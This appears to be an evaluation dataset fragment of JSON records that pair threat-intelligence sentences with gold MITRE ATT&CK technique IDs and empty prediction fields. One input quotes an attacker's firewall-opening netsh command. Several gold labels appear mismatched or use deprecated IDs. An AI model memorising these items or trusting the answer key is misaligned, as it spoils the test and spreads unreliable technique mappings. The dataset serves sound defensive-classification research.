+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used legitimate programs such as AmmyAdmin and Team Viewer for remote interactive C2 to target systems.",
+ "gold": [
+ "T1219"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used Microsoft\u2019s Sysinternals tools to gather detailed information about remote systems.",
+ "gold": [
+ "T1018"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used net use commands to connect to lateral systems within a network.",
+ "gold": [
+ "T1021.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used spearphishing with Microsoft Office attachments to target victims.",
+ "gold": [
+ "T1598.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used TCP port 80 for C2.",
+ "gold": [
+ "T1043"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used various types of scripting to perform operations, including Python and batch scripts. The group was observed installing Python 2.7 on a victim.",
+ "gold": [
+ "T1064"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses a backdoor known as BADFLICK that is is capable of generating a reverse shell.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses a command prompt to run a PowerShell script from Excel.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS. In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses AES to encrypt C2 traffic.",
+ "gold": [
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses an XOR 0x1 loop to encrypt its C2 domain.",
+ "gold": [
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses basic obfuscation in the form of spaghetti code.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses cmd.exe to execute netshcommands.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses commonly used ports (like HTTPS/443) for command and control.",
+ "gold": [
+ "T1043"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses custom encryption for C2 using 3DES and RSA.",
+ "gold": [
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses HTTP/HTTPS for command and control communication.",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses HTTP for command and control.",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses HTTP over port 443 for command and control.",
+ "gold": [
+ "T1043"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses macOS' .command file type to script actions.",
+ "gold": [
+ "T1064"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses multiple proxies to obfuscate network traffic from victims.",
+ "gold": [
+ "T1090"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses net.exe to connect to network shares using net use commands with compromised credentials.",
+ "gold": [
+ "T1021.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses PowerShell to execute various commands, one to execute its payload.",
+ "gold": [
+ "T1059.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses raw sockets to communicate with its C2 server.",
+ "gold": [
+ "T1095"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses RC4 to encrypt C2 responses.",
+ "gold": [
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.",
+ "gold": [
+ "T1218.011"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses tasklist /svc to display running tasks.",
+ "gold": [
+ "T1007"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"uses the command cmd.exe /c netsh firewall add portopening TCP 443 \"\"adp\"\" and makes the victim machine function as a proxy server.\"",
+ "gold": [
+ "T1090"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.",
+ "gold": [
+ "T1027.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses to list TCP connection status.",
+ "gold": [
+ "T1049"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses to perform remote service manipulation to execute a copy of itself as part of lateral movement.",
+ "gold": [
+ "T1569.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses two utilities, GETMAIL and MAPIGET, to steal email. GETMAIL extracts emails from archived Outlook .pst files, and MAPIGET steals email still on Exchange servers that has not yet been archived.",
+ "gold": [
+ "T1114"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses various XOR techniques to obfuscate its components.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.",
+ "gold": [
+ "T1021.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uses WMI to perform process monitoring.",
+ "gold": [
+ "T1047"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.",
+ "gold": [
+ "T1218.010"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "version of communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string \u201c&&&\u201d",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "When it first starts, spawns a new thread to log keystrokes.",
+ "gold": [
+ "T1056"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "When the command and control is operating over HTTP or HTTPS, Duqu uploads data to its controller by appending it to a blank JPG file.",
+ "gold": [
+ "T1001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "will delete files on the system.",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "will zip up the /Library/Keychains directory before exfiltrating it.",
+ "gold": [
+ "T1560"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.",
+ "gold": [
+ "T1486"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "[2] Threat groups use strategic web compromises (SWCs), also known as watering hole attacks, to target a wide array of potential victims",
+ "gold": [
+ "T1189"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The majority of ActiveX Objects created with Wscript.Shell and Shell.Application are used to run programs, create shortcuts, manipulate the contents of the registry, or access system folders",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server (systsm.webServer/httplogging) and then delete existing logs from the system (see Figure 4)",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Gather network addresses and operating system version Execute arbitrary commands using \u201ccmd.exe /c\u201d The capability to execute system commands",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Both variants need to be executed with the command line argument \u201c[2]\u201d to avoid continually attempting to copy and execute the Trojan using the \u201ctmp.vbs\u201d and \u201ctmp1.vbs\u201d files",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "/user : Executes downloaded file with parameters specified using CreateProcessAsUser cmd /c : Executes command on infected endpoint\u00a0 Conclusion\u00a0 The actor behind Honeybee has been operating with new implants since at least November 2017 with the first known version of NTWDBLIB installer",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Traps provides endpoint protection, as it can block Excel from creating a command prompt process",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
